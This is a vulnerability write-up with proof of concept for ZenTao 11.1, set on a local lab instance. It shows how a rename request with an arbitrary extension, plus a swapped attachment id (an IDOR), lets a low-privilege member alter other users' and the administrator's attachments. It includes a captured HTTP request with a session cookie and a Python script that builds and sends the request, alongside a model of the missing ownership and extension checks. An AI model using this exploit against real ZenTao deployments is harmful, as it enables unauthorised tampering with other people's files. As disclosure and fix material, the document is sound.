ZenTao (禅道) 11.1 arbitrary file operation + privilege bypass (IDOR)

1. Arbitrary file operation:

As administrator, create any project, then assign a member to it from the back end:
http://127.0.0.1:1236/company-browse.html

Log in as that member (the novy account) and file a bug (i.e. add a comment):
http://127.0.0.1:1236/bug-browse-1.html

Upload any attachment of a permitted type, save it, then click Rename:

Intercept the rename request in a proxy and change the extension field to rar.

Refresh the page and the attachment is shown with the new extension: the rename handler accepts whatever extension the client sends, not just the ones permitted at upload time.

The request goes to http://127.0.0.1:1236/file-edit-1.html, where the number is the sequential id of the attachment (the order in which it was added). To edit a different attachment, change the id in the request,
e.g. http://127.0.0.1:1236/file-edit-2.html edits the second attachment:

2. Privilege bypass (IDOR)

After logging in, first rename one of your own attachments, intercept the request to obtain the link, then change the id to another user's attachment id; the server does not check that the attachment belongs to the requesting user:

POST /file-edit-4.html HTTP/1.1    // IDOR: the id here (4) was changed to another user's attachment; the attacker's own rename page was file-edit-2, as the Referer shows
Host: 127.0.0.1:1236
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:1236/file-edit-2.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Connection: close
Cookie: device=desktop; theme=default; lastProduct=1; preBranch=0; preProductID=1; checkedItem=; from=product; docFilesViewType=card; zentaosid=ikitlp7bger294dpts96l9v754; windowWidth=400; windowHeight=151; qaBugOrder=id_desc
Upgrade-Insecure-Requests: 1

fileName=1&extension=rar    // the file operation: new name and an arbitrary extension

Modifying the administrator's file:

Vulnerability PoC

http://127.0.0.1:1236/file-edit-2.html (i.e. http://localhost/file-edit-ID.html, with ID set to the target attachment)
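The two requests above (the extension change in section 1 and the id swap in section 2) as an added example, not code from the original write-up or from ZenTao itself: a small Python script that builds the same POST to /file-edit-ID.html with only the standard library, and beside it a model of the two server-side checks (attachment ownership and an extension allow-list) whose absence the write-up exploits. The host, port, session cookie value, file ids and the allow-list contents are assumptions for illustration.

```python
"""
Added example, not from the original write-up or from ZenTao's code base.
Builds the rename POST the write-up intercepts and models the missing checks.
Host, port, cookie value, file ids and the allow-list are assumed values.
"""
import urllib.parse
import urllib.request
from typing import Dict, Set, Tuple

# Assumed target and session (the write-up's lab runs on 127.0.0.1:1236).
BASE_URL = "http://127.0.0.1:1236"
SESSION_COOKIE = "zentaosid=ikitlp7bger294dpts96l9v754"  # attacker's own session, constructed


def build_rename_request(file_id: int, file_name: str, extension: str,
                         base_url: str = BASE_URL,
                         cookie: str = SESSION_COOKIE) -> Tuple[str, bytes, Dict[str, str]]:
    """Return (url, body, headers) for POST /file-edit-<id>.html.

    The server picks the attachment record from the id in the path alone;
    swapping it for another user's id is the IDOR from section 2, and the
    extension field is accepted as sent, which is the file operation from section 1.
    """
    url = f"{base_url}/file-edit-{file_id}.html"
    body = urllib.parse.urlencode({"fileName": file_name, "extension": extension}).encode()
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": cookie,
        # The Referer is whatever page the rename dialog was opened from;
        # it need not match the id being edited.
        "Referer": f"{base_url}/file-edit-{file_id}.html",
    }
    return url, body, headers


def send_rename(file_id: int, file_name: str, extension: str, timeout: float = 5.0) -> int:
    """Send the rename request and return the HTTP status code (real network call)."""
    url, body, headers = build_rename_request(file_id, file_name, extension)
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


# --- Model of what the rename handler should check (not ZenTao's actual fix) ---
# Assumed upload allow-list; rename must not widen it.
ALLOWED_EXTENSIONS: Set[str] = {"txt", "jpg", "png", "pdf", "zip"}


def rename_allowed(requester_id: int, file_owner_id: int, new_extension: str,
                   allowed: Set[str] = ALLOWED_EXTENSIONS) -> Tuple[bool, str]:
    """Ownership check plus extension allow-list; both were missing in the bug."""
    if requester_id != file_owner_id:
        return False, "not the owner of this attachment"
    ext = new_extension.lower().lstrip(".")
    if ext not in allowed:
        return False, f"extension '{ext}' is not permitted"
    return True, "ok"


if __name__ == "__main__":
    url, body, headers = build_rename_request(4, "1", "rar")
    print("POST", url)
    print(body.decode(), "->", len(body), "bytes")  # matches Content-Length: 24 above
    for req_user, owner, ext in [(2, 2, "png"), (2, 1, "png"), (2, 2, "rar")]:
        print(req_user, owner, ext, "=>", rename_allowed(req_user, owner, ext))
    # send_rename(4, "1", "rar")  # only against a lab instance you own
```

build_rename_request reproduces the captured request byte for byte in the body (24 bytes), so it can be compared against the proxy capture; send_rename is left as an explicit call so the script does nothing on the network unless you choose to. The rename_allowed model is the shape of the fix: reject when the session user does not own the attachment, and only then validate the extension against the same list used at upload.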

Disclaimer:
This article is for study and communication only. It is strictly forbidden to use it for illegal operations; all consequences are borne by yourself. Reading this article means that you have agreed to this statement.